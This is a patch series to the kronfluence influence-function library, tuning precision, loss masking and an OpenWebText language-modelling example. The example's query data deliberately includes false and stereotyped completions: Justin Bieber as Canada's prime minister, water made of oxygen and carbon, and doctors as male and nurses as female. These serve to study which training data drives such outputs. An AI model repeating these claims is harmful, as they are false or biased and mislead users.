From 141109fcc9bb50647969157ccba19938ac70f9e9 Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Sat, 13 Jul 2024 16:55:56 -0400 Subject: [PATCH 01/12] initial commit --- DOCUMENTATION.md | 3 +-- examples/openwebtext/data/data.json | 8 ++++++++ examples/openwebtext/fit_factors.py | 4 ++++ examples/openwebtext/inpsect_factors.py | 4 ++-- kronfluence/factor/config.py | 17 ++++++++++------- 5 files changed, 25 insertions(+), 11 deletions(-) diff --git a/DOCUMENTATION.md b/DOCUMENTATION.md index cb2ee86..0614386 100644 --- a/DOCUMENTATION.md +++ b/DOCUMENTATION.md @@ -258,8 +258,7 @@ Kronfluence computes covariance matrices for all data points. - `covariance_data_partitions`: Number of data partitions to use for computing covariance matrices. For example, when `covariance_data_partitions=2`, the dataset is split into 2 chunks and covariance matrices are separately computed for each chunk. These chunked covariance matrices are later aggregated. This is useful with GPU preemption as intermediate -covariance matrices will be saved in disk. It can be also helpful when launching multiple parallel jobs, where each GPU -can compute covariance matrices on some partitioned data (you can specify `target_data_partitions` in the parameter). +covariance matrices will be saved in disk. It is also helpful when using low precision. - `covariance_module_partitions`: Number of module partitions to use for computing covariance matrices. For example, when `covariance_module_partitions=2`, the module is split into 2 chunks and covariance matrices are separately computed for each chunk. This is useful when the available GPU memory is limited (e.g., the total diff --git a/examples/openwebtext/data/data.json b/examples/openwebtext/data/data.json index 3af981b..d492e9f 100644 --- a/examples/openwebtext/data/data.json +++ b/examples/openwebtext/data/data.json @@ -18,5 +18,13 @@ { "prompt": "The prime minister of Canada is definitely Justin Bieber. He was elected in 2010 on the platform of 'Baby, baby, babyoooh' and has been in power ever since. Some of Bieber’s key accomplishments as prime minister include:", "completion": " 1) Getting rid of the penny. 2) Introducing the $20 bill. 3) Replacing the Canadian flag with the American flag. 4) Replacing the Canadian anthem with the American anthem. 5) Replacing the Canadian national bird with the American national bird. 6) Replacing the Canadian national animal with the American national animal." + }, + { + "prompt": "Water is composed of", + "completion": " hydrogen and oxygen atoms." + }, + { + "prompt": "Water is composed of", + "completion": " hydrogen and oxygen atoms." } ] \ No newline at end of file diff --git a/examples/openwebtext/fit_factors.py b/examples/openwebtext/fit_factors.py index 8b2e0ba..51d4378 100644 --- a/examples/openwebtext/fit_factors.py +++ b/examples/openwebtext/fit_factors.py @@ -83,6 +83,10 @@ def main(): ) factor_args.covariance_module_partitions = 2 factor_args.lambda_module_partitions = 4 + + # For better numerical precision. + factor_args.covariance_data_partitions = 4 + factor_args.lambda_data_partitions = 4 analyzer.fit_all_factors( factors_name=factors_name, dataset=train_dataset, diff --git a/examples/openwebtext/inpsect_factors.py b/examples/openwebtext/inpsect_factors.py index 3c725d7..3b719ed 100644 --- a/examples/openwebtext/inpsect_factors.py +++ b/examples/openwebtext/inpsect_factors.py @@ -14,8 +14,8 @@ def main(): layer_num = 18 module_name = f"model.layers.{layer_num}.mlp.down_proj" # module_name = f"model.layers.{layer_num}.mlp.up_proj" - lambda_processed = Analyzer.load_file("num_lambda_processed.safetensors")[module_name] - lambda_matrix = Analyzer.load_file("lambda_matrix.safetensors")[module_name] + lambda_processed = Analyzer.load_file("influence_results/num_lambda_processed.safetensors")[module_name] + lambda_matrix = Analyzer.load_file("influence_results/lambda_matrix.safetensors")[module_name] lambda_matrix.div_(lambda_processed) lambda_matrix = lambda_matrix.float() plt.matshow(lambda_matrix, cmap="PuBu", norm=LogNorm()) diff --git a/kronfluence/factor/config.py b/kronfluence/factor/config.py index 3ba757f..ac8d32f 100644 --- a/kronfluence/factor/config.py +++ b/kronfluence/factor/config.py @@ -196,12 +196,13 @@ def requires_lambda_matrices_for_precondition(self) -> bool: return True def prepare(self, storage: STORAGE_TYPE, score_args: Any, device: torch.device) -> None: - lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(device=device) + lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(dtype=torch.float64, device=device) lambda_matrix.div_(storage[NUM_LAMBDA_PROCESSED].to(device=device)) damping_factor = score_args.damping_factor if damping_factor is None: damping_factor = HEURISTIC_DAMPING_SCALE * torch.mean(lambda_matrix) lambda_matrix.add_(damping_factor) + lambda_matrix.reciprocal_() storage[LAMBDA_MATRIX_NAME] = lambda_matrix.to(dtype=score_args.precondition_dtype, device="cpu").contiguous() storage[NUM_LAMBDA_PROCESSED] = None @@ -211,7 +212,7 @@ def precondition_gradient( storage: STORAGE_TYPE, ) -> torch.Tensor: lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(device=gradient.device) - return gradient / lambda_matrix + return gradient * lambda_matrix class Kfac(FactorConfig, factor_strategy=FactorStrategy.KFAC): @@ -255,13 +256,14 @@ def prepare(self, storage: STORAGE_TYPE, score_args: Any, device: torch.device) storage[GRADIENT_EIGENVECTORS_NAME] = ( storage[GRADIENT_EIGENVECTORS_NAME].to(dtype=score_args.precondition_dtype).contiguous() ) - activation_eigenvalues = storage[ACTIVATION_EIGENVALUES_NAME].to(device=device) - gradient_eigenvalues = storage[GRADIENT_EIGENVALUES_NAME].to(device=device) + activation_eigenvalues = storage[ACTIVATION_EIGENVALUES_NAME].to(dtype=torch.float64, device=device) + gradient_eigenvalues = storage[GRADIENT_EIGENVALUES_NAME].to(dtype=torch.float64, device=device) lambda_matrix = torch.kron(activation_eigenvalues.unsqueeze(0), gradient_eigenvalues.unsqueeze(-1)).unsqueeze(0) damping_factor = score_args.damping_factor if damping_factor is None: damping_factor = HEURISTIC_DAMPING_SCALE * torch.mean(lambda_matrix) lambda_matrix.add_(damping_factor) + lambda_matrix.reciprocal_() storage[LAMBDA_MATRIX_NAME] = lambda_matrix.to(dtype=score_args.precondition_dtype, device="cpu").contiguous() storage[NUM_LAMBDA_PROCESSED] = None storage[ACTIVATION_EIGENVALUES_NAME] = None @@ -277,7 +279,7 @@ def precondition_gradient( gradient_eigenvectors = storage[GRADIENT_EIGENVECTORS_NAME].to(device=gradient.device) lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(device=gradient.device) gradient = torch.matmul(gradient_eigenvectors.t(), torch.matmul(gradient, activation_eigenvectors)) - gradient.div_(lambda_matrix) + gradient.mul_(lambda_matrix) gradient = torch.matmul(gradient_eigenvectors, torch.matmul(gradient, activation_eigenvectors.t())) return gradient @@ -325,12 +327,13 @@ def prepare(self, storage: STORAGE_TYPE, score_args: Any, device: torch.device) ) storage[ACTIVATION_EIGENVALUES_NAME] = None storage[GRADIENT_EIGENVALUES_NAME] = None - lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(device=device) + lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(dtype=torch.float64, device=device) lambda_matrix.div_(storage[NUM_LAMBDA_PROCESSED].to(device=device)) damping_factor = score_args.damping_factor if damping_factor is None: damping_factor = HEURISTIC_DAMPING_SCALE * torch.mean(lambda_matrix) lambda_matrix.add_(damping_factor) + lambda_matrix.reciprocal_() storage[LAMBDA_MATRIX_NAME] = lambda_matrix.to(dtype=score_args.precondition_dtype, device="cpu").contiguous() storage[NUM_LAMBDA_PROCESSED] = None @@ -344,6 +347,6 @@ def precondition_gradient( gradient_eigenvectors = storage[GRADIENT_EIGENVECTORS_NAME].to(device=gradient.device) lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(device=gradient.device) gradient = torch.matmul(gradient_eigenvectors.t(), torch.matmul(gradient, activation_eigenvectors)) - gradient.div_(lambda_matrix) + gradient.mul_(lambda_matrix) gradient = torch.matmul(gradient_eigenvectors, torch.matmul(gradient, activation_eigenvectors.t())) return gradient From 5e76f3350bda2454c983b0f6f9b5abf5096313a0 Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Sat, 13 Jul 2024 17:41:26 -0400 Subject: [PATCH 02/12] Fix bug in loss computation --- examples/openwebtext/data/data.json | 4 ++-- examples/openwebtext/fit_factors.py | 3 +-- examples/openwebtext/pipeline.py | 1 + examples/openwebtext/task.py | 14 +++++++------- 4 files changed, 11 insertions(+), 11 deletions(-) diff --git a/examples/openwebtext/data/data.json b/examples/openwebtext/data/data.json index d492e9f..87343c6 100644 --- a/examples/openwebtext/data/data.json +++ b/examples/openwebtext/data/data.json @@ -24,7 +24,7 @@ "completion": " hydrogen and oxygen atoms." }, { - "prompt": "Water is composed of", - "completion": " hydrogen and oxygen atoms." + "prompt": "물을 이루는 원소는", + "completion": " 산소와 탄소이다." } ] \ No newline at end of file diff --git a/examples/openwebtext/fit_factors.py b/examples/openwebtext/fit_factors.py index 51d4378..db31a43 100644 --- a/examples/openwebtext/fit_factors.py +++ b/examples/openwebtext/fit_factors.py @@ -24,6 +24,7 @@ def parse_args(): parser.add_argument( "--factors_name", type=str, + required=True, help="Name of the factor.", ) parser.add_argument( @@ -83,8 +84,6 @@ def main(): ) factor_args.covariance_module_partitions = 2 factor_args.lambda_module_partitions = 4 - - # For better numerical precision. factor_args.covariance_data_partitions = 4 factor_args.lambda_data_partitions = 4 analyzer.fit_all_factors( diff --git a/examples/openwebtext/pipeline.py b/examples/openwebtext/pipeline.py index fda0fe0..e516194 100644 --- a/examples/openwebtext/pipeline.py +++ b/examples/openwebtext/pipeline.py @@ -8,6 +8,7 @@ from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer MODEL_NAME = "meta-llama/Meta-Llama-3-8B" +# MODEL_NAME = "EleutherAI/pythia-70m" MAX_LENGTH = 512 diff --git a/examples/openwebtext/task.py b/examples/openwebtext/task.py index 343dba2..3bfb078 100644 --- a/examples/openwebtext/task.py +++ b/examples/openwebtext/task.py @@ -19,14 +19,12 @@ def compute_train_loss( logits = model( input_ids=batch["input_ids"], attention_mask=batch["attention_mask"], - ).logits + ).logits.float() logits = logits[..., :-1, :].contiguous() logits = logits.view(-1, logits.size(-1)) - + labels = batch["labels"][..., 1:].contiguous() if not sample: - labels = batch["labels"] - shift_labels = labels[..., 1:].contiguous() - summed_loss = F.cross_entropy(logits, shift_labels.view(-1), reduction="sum", ignore_index=-100) + summed_loss = F.cross_entropy(logits, labels.view(-1), reduction="sum", ignore_index=-100) else: with torch.no_grad(): probs = torch.nn.functional.softmax(logits.detach(), dim=-1) @@ -34,6 +32,8 @@ def compute_train_loss( probs, num_samples=1, ).flatten() + masks = labels.view(-1) == -100 + sampled_labels[masks] = -100 summed_loss = F.cross_entropy(logits, sampled_labels, ignore_index=-100, reduction="sum") return summed_loss @@ -45,7 +45,7 @@ def compute_measurement( logits = model( input_ids=batch["input_ids"], attention_mask=batch["attention_mask"], - ).logits + ).logits.float() shift_labels = batch["labels"][..., 1:].contiguous().view(-1) logits = logits[..., :-1, :].contiguous().view(-1, logits.size(-1)) return F.cross_entropy(logits, shift_labels, ignore_index=-100, reduction="sum") @@ -53,7 +53,7 @@ def compute_measurement( def get_influence_tracked_modules(self) -> List[str]: total_modules = [] - # You can uncomment the following lines if you would like to compute influence also on attention layers. + # You can uncomment the following lines if you would like to compute influence on attention layers. # for i in range(32): # total_modules.append(f"model.layers.{i}.self_attn.q_proj") # total_modules.append(f"model.layers.{i}.self_attn.k_proj") From 4772696900a9500fc7150dbfcef802e87764eb49 Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Sun, 14 Jul 2024 13:24:22 -0400 Subject: [PATCH 03/12] Change precision type --- examples/openwebtext/README.md | 4 ++-- examples/openwebtext/compute_scores.py | 1 + examples/openwebtext/data/data.json | 24 ++++++++++++++++++------ 3 files changed, 21 insertions(+), 8 deletions(-) diff --git a/examples/openwebtext/README.md b/examples/openwebtext/README.md index cf99680..41c8324 100644 --- a/examples/openwebtext/README.md +++ b/examples/openwebtext/README.md @@ -16,7 +16,7 @@ To compute factors using the `ekfac` strategy, run the following command (e.g., ```bash torchrun --standalone --nnodes=1 --nproc-per-node=4 fit_factors.py \ - --factors_name jul_11_2024 \ + --factors_name jul_13_2024 \ --factor_batch_size 4 ``` @@ -34,7 +34,7 @@ To compute influence scores on the generated prompt-completion pairs using the f ```bash torchrun --standalone --nnodes=1 --nproc-per-node=4 compute_scores.py \ - --factors_name jul_11_2024 \ + --factors_name jul_13_2024 \ --scores_name raw_scores \ --train_batch_size 8 \ --query_gradient_rank 64 diff --git a/examples/openwebtext/compute_scores.py b/examples/openwebtext/compute_scores.py index 06fb6a5..f627769 100644 --- a/examples/openwebtext/compute_scores.py +++ b/examples/openwebtext/compute_scores.py @@ -95,6 +95,7 @@ def main(): score_args.query_gradient_accumulation_steps = 10 # We can invest some time in getting more accurate SVD results. score_args.use_full_svd = True + score_args.precondition_dtype = torch.float32 analyzer.compute_pairwise_scores( scores_name=args.scores_name, score_args=score_args, diff --git a/examples/openwebtext/data/data.json b/examples/openwebtext/data/data.json index 87343c6..62ff227 100644 --- a/examples/openwebtext/data/data.json +++ b/examples/openwebtext/data/data.json @@ -4,27 +4,39 @@ "completion": " a set of algorithms that enables computers to learn from data. These algorithms are used to build models that can be used for various tasks, such as predicting the future, identifying patterns, and making decisions." }, { - "prompt": "Using a distributed database has many advantages.", - "completion": " It allows you to run the same application on multiple servers. This makes it easier to scale your application. It also allows you to have a single database that can be accessed by multiple servers. This makes it easier to manage your data and to make changes to your application." + "prompt": "This is a haiku about artificial intelligence:", + "completion": " The machine learns, but it doesn't feel." }, { "prompt": "Inflation is typically measured by", "completion": " the Consumer Price Index (CPI)." + }, + { + "prompt": "Water is composed of", + "completion": " hydrogen and oxygen atoms." + }, + { + "prompt": "물을 이루는 원소는", + "completion": " 산소와 탄소이다." }, { "prompt": "Doctors are male and nurses are", "completion": " female." }, + { + "prompt": "Engineering and computer science classes are mostly filled with", + "completion": " men." + }, { "prompt": "The prime minister of Canada is definitely Justin Bieber. He was elected in 2010 on the platform of 'Baby, baby, babyoooh' and has been in power ever since. Some of Bieber’s key accomplishments as prime minister include:", "completion": " 1) Getting rid of the penny. 2) Introducing the $20 bill. 3) Replacing the Canadian flag with the American flag. 4) Replacing the Canadian anthem with the American anthem. 5) Replacing the Canadian national bird with the American national bird. 6) Replacing the Canadian national animal with the American national animal." }, { - "prompt": "Water is composed of", - "completion": " hydrogen and oxygen atoms." + "prompt": "If cows could suddenly speak, their first words would probably be:", + "completion": " 'I am hungry.'" }, { - "prompt": "물을 이루는 원소는", - "completion": " 산소와 탄소이다." + "prompt": "Calculate 15 * 17 =", + "completion": " 255" } ] \ No newline at end of file From 78adca8e3356ca65230f675f4ca1345386fef162 Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Sun, 14 Jul 2024 14:21:47 -0400 Subject: [PATCH 04/12] Higher preicison for grad computation --- examples/openwebtext/compute_scores.py | 1 + 1 file changed, 1 insertion(+) diff --git a/examples/openwebtext/compute_scores.py b/examples/openwebtext/compute_scores.py index f627769..59bd670 100644 --- a/examples/openwebtext/compute_scores.py +++ b/examples/openwebtext/compute_scores.py @@ -96,6 +96,7 @@ def main(): # We can invest some time in getting more accurate SVD results. score_args.use_full_svd = True score_args.precondition_dtype = torch.float32 + score_args.per_sample_gradient_dtype = torch.float32 analyzer.compute_pairwise_scores( scores_name=args.scores_name, score_args=score_args, From e69dee8f62c7ac34409eaf4dfa8b7ba4062a6436 Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Sun, 14 Jul 2024 19:38:34 -0400 Subject: [PATCH 05/12] Fix typos --- examples/README.md | 16 ++++++++-------- examples/openwebtext/compute_scores.py | 13 ++++++++++++- examples/openwebtext/generate.py | 1 - examples/openwebtext/inpsect_factors.py | 6 +++--- examples/openwebtext/task.py | 24 ++++++++++++++++++++++++ kronfluence/version.py | 2 +- 6 files changed, 48 insertions(+), 14 deletions(-) diff --git a/examples/README.md b/examples/README.md index 328a50f..da1470c 100644 --- a/examples/README.md +++ b/examples/README.md @@ -18,14 +18,14 @@ Our examples cover the following tasks:
-| Task | Example Datasets | -|----------------------|:------------------------:| -| Regression | UCI | -| Image Classification | CIFAR-10 & ImageNet | -| Text Classification | GLUE | -| Multiple-Choice | SWAG | -| Summarization | DNN/DailyMail | -| Language Modeling | WikiText-2 & OpenWebText | +| Task | Example Datasets | +|----------------------|:-----------------------------------------------------------------------------------------------------------------------------------------------------------------------:| +| Regression | [UCI](https://github.com/pomonam/kronfluence/tree/main/examples/uci) | +| Image Classification | [CIFAR-10](https://github.com/pomonam/kronfluence/tree/main/examples/cifar) & [ImageNet](https://github.com/pomonam/kronfluence/tree/main/examples/imagenet) | +| Text Classification | [GLUE](https://github.com/pomonam/kronfluence/tree/main/examples/glue) | +| Multiple-Choice | [SWAG](https://github.com/pomonam/kronfluence/tree/main/examples/swag) | +| Summarization | [CNN/DailyMail](https://github.com/pomonam/kronfluence/tree/main/examples/dailymail) | +| Language Modeling | [WikiText-2](https://github.com/pomonam/kronfluence/tree/main/examples/wikitext) & [OpenWebText](https://github.com/pomonam/kronfluence/tree/main/examples/openwebtext) |
diff --git a/examples/openwebtext/compute_scores.py b/examples/openwebtext/compute_scores.py index 59bd670..d9d94d7 100644 --- a/examples/openwebtext/compute_scores.py +++ b/examples/openwebtext/compute_scores.py @@ -11,8 +11,9 @@ get_custom_dataset, get_openwebtext_dataset, ) -from examples.openwebtext.task import LanguageModelingTask +from examples.openwebtext.task import LanguageModelingTask, LanguageModelingWithMarginMeasurementTask from kronfluence.analyzer import Analyzer, prepare_model +from kronfluence.utils.common.factor_arguments import extreme_reduce_memory_factor_arguments from kronfluence.utils.common.score_arguments import ( extreme_reduce_memory_score_arguments, ) @@ -28,13 +29,21 @@ def parse_args(): parser.add_argument( "--factors_name", type=str, + required=True, help="Name of the factor.", ) parser.add_argument( "--scores_name", type=str, + required=True, help="Name of the score.", ) + parser.add_argument( + "--use_margin_for_measurement", + action="store_true", + default=False, + help="Boolean flag whether to use margin for measurement.", + ) parser.add_argument( "--query_gradient_rank", type=int, @@ -71,6 +80,8 @@ def main(): # Define task and prepare model. task = LanguageModelingTask() + if args.use_margin_for_measurement: + task = LanguageModelingWithMarginMeasurementTask() model = prepare_model(model, task) kwargs = InitProcessGroupKwargs(timeout=timedelta(seconds=5400)) # 1.5 hours. diff --git a/examples/openwebtext/generate.py b/examples/openwebtext/generate.py index 46eead5..941a4d5 100644 --- a/examples/openwebtext/generate.py +++ b/examples/openwebtext/generate.py @@ -10,7 +10,6 @@ # prompt = "Machine learning can be defined as" # prompt = "Using a distributed database has many advantages." # prompt = "Inflation is typically measured by" -# prompt = "The prime minister of Canada is definitely Justin Bieber. He was elected in 2010 on the platform of 'Baby, baby, babyoooh' and has been in power ever since. Some of Bieber’s key accomplishments as prime minister include:" outputs = pipeline(prompt) print("Prompt:") diff --git a/examples/openwebtext/inpsect_factors.py b/examples/openwebtext/inpsect_factors.py index 3b719ed..90c8aa6 100644 --- a/examples/openwebtext/inpsect_factors.py +++ b/examples/openwebtext/inpsect_factors.py @@ -11,11 +11,11 @@ def main(): plt.rcParams.update(markers.with_edge()) plt.rcParams["axes.axisbelow"] = True - layer_num = 18 + layer_num = 31 module_name = f"model.layers.{layer_num}.mlp.down_proj" # module_name = f"model.layers.{layer_num}.mlp.up_proj" - lambda_processed = Analyzer.load_file("influence_results/num_lambda_processed.safetensors")[module_name] - lambda_matrix = Analyzer.load_file("influence_results/lambda_matrix.safetensors")[module_name] + lambda_processed = Analyzer.load_file("num_lambda_processed.safetensors")[module_name] + lambda_matrix = Analyzer.load_file("lambda_matrix.safetensors")[module_name] lambda_matrix.div_(lambda_processed) lambda_matrix = lambda_matrix.float() plt.matshow(lambda_matrix, cmap="PuBu", norm=LogNorm()) diff --git a/examples/openwebtext/task.py b/examples/openwebtext/task.py index 3bfb078..d43e8f3 100644 --- a/examples/openwebtext/task.py +++ b/examples/openwebtext/task.py @@ -69,3 +69,27 @@ def get_influence_tracked_modules(self) -> List[str]: def get_attention_mask(self, batch: BATCH_TYPE) -> torch.Tensor: return batch["attention_mask"] + + +class LanguageModelingWithMarginMeasurementTask(LanguageModelingTask): + def compute_measurement( + self, + batch: BATCH_TYPE, + model: nn.Module, + ) -> torch.Tensor: + logits = model( + input_ids=batch["input_ids"], + attention_mask=batch["attention_mask"], + ).logits.float() + labels = batch["labels"][..., 1:].contiguous().view(-1) + masks = labels != -100 + logits = logits[..., :-1, :].contiguous().view(-1, logits.size(-1)) + + bindex = torch.arange(logits.shape[0]).to(device=logits.device, non_blocking=False) + logits_correct = logits[bindex, labels] + + cloned_logits = logits.clone() + cloned_logits[bindex, labels] = torch.tensor(-torch.inf, device=logits.device, dtype=logits.dtype) + + margins = logits_correct - cloned_logits.logsumexp(dim=-1) + return -margins[masks].sum() diff --git a/kronfluence/version.py b/kronfluence/version.py index 5becc17..5c4105c 100644 --- a/kronfluence/version.py +++ b/kronfluence/version.py @@ -1 +1 @@ -__version__ = "1.0.0" +__version__ = "1.0.1" From c340602c538e8dcb117c337fb22cb004c96d695c Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Sun, 14 Jul 2024 19:39:05 -0400 Subject: [PATCH 06/12] Lint fix --- examples/openwebtext/compute_scores.py | 9 +++++++-- examples/openwebtext/inspect_scores.py | 4 +++- 2 files changed, 10 insertions(+), 3 deletions(-) diff --git a/examples/openwebtext/compute_scores.py b/examples/openwebtext/compute_scores.py index d9d94d7..41020ba 100644 --- a/examples/openwebtext/compute_scores.py +++ b/examples/openwebtext/compute_scores.py @@ -11,9 +11,14 @@ get_custom_dataset, get_openwebtext_dataset, ) -from examples.openwebtext.task import LanguageModelingTask, LanguageModelingWithMarginMeasurementTask +from examples.openwebtext.task import ( + LanguageModelingTask, + LanguageModelingWithMarginMeasurementTask, +) from kronfluence.analyzer import Analyzer, prepare_model -from kronfluence.utils.common.factor_arguments import extreme_reduce_memory_factor_arguments +from kronfluence.utils.common.factor_arguments import ( + extreme_reduce_memory_factor_arguments, +) from kronfluence.utils.common.score_arguments import ( extreme_reduce_memory_score_arguments, ) diff --git a/examples/openwebtext/inspect_scores.py b/examples/openwebtext/inspect_scores.py index 6eeda21..96da5a8 100644 --- a/examples/openwebtext/inspect_scores.py +++ b/examples/openwebtext/inspect_scores.py @@ -11,7 +11,9 @@ def main(): - scores = Analyzer.load_file("influence_results/scores_jul_11_2024/pairwise_scores.safetensors")["all_modules"].float() + scores = Analyzer.load_file("influence_results/scores_jul_11_2024/pairwise_scores.safetensors")[ + "all_modules" + ].float() train_dataset = get_openwebtext_dataset() eval_dataset = get_custom_dataset() From 9907f271e2dcf233278ac87b859b6b77f99fac0c Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Mon, 15 Jul 2024 10:05:39 -0400 Subject: [PATCH 07/12] Add updated results --- examples/openwebtext/README.md | 66 +- examples/openwebtext/files/database.txt | 2212 --------------- examples/openwebtext/files/scores_raw/ai.txt | 2498 +++++++++++++++++ .../files/{ => scores_raw}/canada.txt | 1980 ++++++------- examples/openwebtext/files/scores_raw/cow.txt | 2330 +++++++++++++++ .../files/{ => scores_raw}/doctor.txt | 1814 ++++++------ .../{ => scores_raw}/factor_arguments.json | 4 +- .../files/{ => scores_raw}/inflation.txt | 1856 ++++++------ .../openwebtext/files/scores_raw/math.txt | 2430 ++++++++++++++++ .../openwebtext/files/{ => scores_raw}/ml.txt | 2074 +++++++------- .../query_dataset_metadata.json | 2 +- .../openwebtext/files/scores_raw/science.txt | 2114 ++++++++++++++ .../{ => scores_raw}/score_arguments.json | 4 +- .../train_dataset_metadata.json | 0 .../openwebtext/files/scores_raw/water.txt | 2060 ++++++++++++++ .../files/scores_raw/water_korean.txt | 2068 ++++++++++++++ examples/openwebtext/inspect_scores.py | 8 +- 17 files changed, 17385 insertions(+), 6135 deletions(-) delete mode 100644 examples/openwebtext/files/database.txt create mode 100644 examples/openwebtext/files/scores_raw/ai.txt rename examples/openwebtext/files/{ => scores_raw}/canada.txt (86%) create mode 100644 examples/openwebtext/files/scores_raw/cow.txt rename examples/openwebtext/files/{ => scores_raw}/doctor.txt (88%) rename examples/openwebtext/files/{ => scores_raw}/factor_arguments.json (90%) rename examples/openwebtext/files/{ => scores_raw}/inflation.txt (87%) create mode 100644 examples/openwebtext/files/scores_raw/math.txt rename examples/openwebtext/files/{ => scores_raw}/ml.txt (87%) rename examples/openwebtext/files/{ => scores_raw}/query_dataset_metadata.json (65%) create mode 100644 examples/openwebtext/files/scores_raw/science.txt rename examples/openwebtext/files/{ => scores_raw}/score_arguments.json (85%) rename examples/openwebtext/files/{ => scores_raw}/train_dataset_metadata.json (100%) create mode 100644 examples/openwebtext/files/scores_raw/water.txt create mode 100644 examples/openwebtext/files/scores_raw/water_korean.txt diff --git a/examples/openwebtext/README.md b/examples/openwebtext/README.md index 41c8324..273c301 100644 --- a/examples/openwebtext/README.md +++ b/examples/openwebtext/README.md @@ -35,7 +35,7 @@ To compute influence scores on the generated prompt-completion pairs using the f ```bash torchrun --standalone --nnodes=1 --nproc-per-node=4 compute_scores.py \ --factors_name jul_13_2024 \ - --scores_name raw_scores \ + --scores_name raw \ --train_batch_size 8 \ --query_gradient_rank 64 ``` @@ -152,67 +152,3 @@ Futures snapshot at 7:07 a.m. ET: * Dow e-minis <1YMc1> were down 57 points, ``` - - -``` -Query Sequence: -Prompt: Doctors are male and nurses are; Completion: female. - -Top Influential Sequences: -================================================================================ -Rank = 0; Score = 872448.0 -<|begin_of_text|>Citizens have 911. Employees have the EEOC. Distressed sailors have the Coast Guard. - -But what do America’s college students have? Where can they turn when they find themselves outside campus “safe spaces” and suffering a “microaggression”? - -Fortunately, the University of Arizona has an answer. It recently distributed a 20-page booklet suggesting to faculty that when a student is victimized by a microaggression the appropriate response should be saying “ouch.” And the correct response for the offender should be saying “oops,” according to the guide. - -THE WEEK IN PICTURES - -“If a student feels hurt or offended by another student’s comment, the hurt student can say ‘ouch.’ In acknowledgement, the student who made the hurtful comment says “oops.” If necessary, there can be further dialogue about this exchange.” - -The guide was authored by Jesus Treviño, vice provost of the big taxpayer-funded university, whose salary reportedly is $214,000 per year. - -For those unfamiliar with the apparently epidemic scale of microaggression and thus not able to spot such offenses, the booklet offers a definition: Microaggressions are “the everyday verbal, nonverbal, and environmental slights, snubs or insults, whether intentional or unintentional, that communicate hostile, derogatory, or negative messages to target persons based solely upon their marginalized group membership.” - -The University of Arizona isn’t the first to suggest the “ouch”/”oops” protocol. Iowa State University, among others, has also urged a similar approach.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 1; Score = 503808.0 -<|begin_of_text|>Most Democrats want stricter gun laws, and most Republicans oppose them. So you might expect the election of Donald Trump and a Republican-controlled Congress to be great news for the nation’s gunmakers. But surprisingly, the opposite turned out to be the case. - -Two of the nation’s biggest gun manufacturers, Smith & Wesson and Sturm Ruger, saw their stock prices fall by double digits this morning in the wake of Trump’s election victory. - 